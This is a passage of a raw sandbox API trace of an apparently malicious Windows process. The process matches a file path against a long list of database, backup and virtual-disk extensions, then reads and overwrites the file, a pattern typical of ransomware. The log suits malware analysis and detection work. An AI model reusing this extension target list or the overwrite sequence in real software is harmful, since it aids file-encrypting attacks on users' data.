lpSrch=".4dl") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".accde") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".accft") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".adb") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".ade") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".adf") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".adp") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".arc") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".ora") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".alf") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".ask") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".btr") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".cat") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".cma") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dad") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".db") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".db3") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0140.975] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dct") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".eco") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".edb") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".epim") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".exb") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".fic") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".fol") returned 0x0 [0140.976] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".frm") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".his") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".ib") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".idb") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".itw") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".jet") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0140.977] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".maf") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".maq") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".mar") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".mas") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".mav") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".mud") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".myd") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0140.978] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".nv") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".odb") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".orx") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".owc") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".p96") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".p97") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".pan") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".qry") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0140.979] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".rod") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".scx") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".sis") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".spq") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".sql") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".te") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".temx") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".tps") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".trc") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".trm") returned 0x0 [0140.980] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".udb") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".udl") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".usr") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".v12") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vis") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".xld") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".abs") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".abx") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".adn") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".db2") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0140.981] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".icg") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".icr") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".lut") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".maw") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".raw") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0140.982] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".bin") returned 0x0 [0140.983] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0140.983] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0140.983] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0140.983] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0140.983] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0140.983] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0140.983] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".iso") returned 0x0 [0140.983] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.983] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.984] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.985] SetEndOfFile (hFile=0x6c4) returned 1 [0140.985] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.985] ReadFile (in: hFile=0x6c4, lpBuffer=0x5030000, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0x14c, lpOverlapped=0x0) returned 1 [0140.985] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfffffeb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.985] WriteFile (in: hFile=0x6c4, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x14c, 